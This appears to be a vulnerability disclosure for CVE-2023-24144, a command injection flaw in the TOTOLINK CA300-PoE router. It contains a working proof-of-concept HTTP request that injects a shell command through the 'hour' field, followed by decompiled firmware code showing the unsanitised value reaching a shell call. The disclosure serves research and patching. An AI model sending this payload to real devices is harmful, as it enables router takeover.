CVE-2023-24144: CVE-vulns/setRebootScheCfg_hour.md at main · Double-q1015/CVE-vulns
TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the hour parameter in the setRebootScheCfg function.
TOTOLINK Router CA300-PoE V6.2c.884 was found to contain a command injection vulnerability in setRebootScheCfg.
POST /cgi-bin/cstecgi.cgi HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 100
Connection: keep-alive
Cookie: SESSION_ID=2:1673492439:2
{"topicurl" :"setting/setRebootScheCfg","mode" : "1", "hour": "';mkdir /hour_1111;'"}
int __fastcall setRebootScheCfg(int a1, int a2, int a3)
int mode_v; // $s5
int week_v; // $s3
const char *hour_v; // $fp
const char *minute_v; // $s7
int recHour_v; // $s0
int v9; // $v0
int v11; // $v0
int i; // $s0
_BYTE *v13; // $v0
char *v14; // $a0
int v15; // $s0
int v16; // $s0
char v19[256]; // [sp+2Ch] [-244h] BYREF
char v20[128]; // [sp+12Ch] [-144h] BYREF
char v21[128]; // [sp+1ACh] [-C4h] BYREF
int v22[16]; // [sp+22Ch] [-44h] BYREF
memset(v20, 0, sizeof(v20));
memset(v21, 0, sizeof(v21));
memset(v19, 0, sizeof(v19));
mode_v = websGetVar(a2, "mode", "0");
week_v = websGetVar(a2, "week", "");
hour_v = (const char *)websGetVar(a2, "hour", "");
minute_v = (const char *)websGetVar(a2, "minute", "");
recHour_v = websGetVar(a2, "recHour", "0");
cs_uci_set("system.reboot.mode", mode_v);
cs_uci_set("system.reboot.week", week_v);
cs_uci_set("system.reboot.hour", hour_v);
cs_uci_set("system.reboot.minute", minute_v);
cs_uci_set("system.reboot.recHour", recHour_v);
strcpy(v19, "sed -i /reboot/d /etc/crontabs/root");
CsteSystem(v19, 0);
CsteSystem("killall sche_reboot", 0);
v9 = atoi(mode_v);
if ( v9 == 1 ) // mode=1
v11 = atoi(week_v);
if ( v11 == 255 )
strcpy(v21, "*");
else if ( v11 )
for ( i = 1; i != 8; ++i )
if ( ((atoi(week_v) >> i) & 1) != 0 )
sprintf(v20, (const char *)&dword_4404, i);
strcat(v21, v20);
strcat(v21, &dword_4408);
v13 = (_BYTE *)strrchr(v21, 44);
if ( v13 )
*v13 = 0;
sprintf(v19, "echo '%s %s * * %s reboot -f'>> /etc/crontabs/root", minute_v, hour_v, v21);
v14 = v19;
CsteSystem(v14, 0);
goto LABEL_3;
if ( v9 == 2 )
v15 = atoi(recHour_v);
if ( v15 > 0 )
v16 = 3600 * v15 - v22[0];
if ( v16 <= 0 )
cs_cmd("reboot", 16464, 1);
goto LABEL_3;
CsteSystem("killall sche_reboot", 0);
sprintf(v20, "sche_reboot %ld &", v16);
v14 = v20;
goto LABEL_13;
cs_cmd("/etc/init.d/cron", "restart", 2);
websSetCfgResponse(a1, a3, "0", "reserv");
return 0;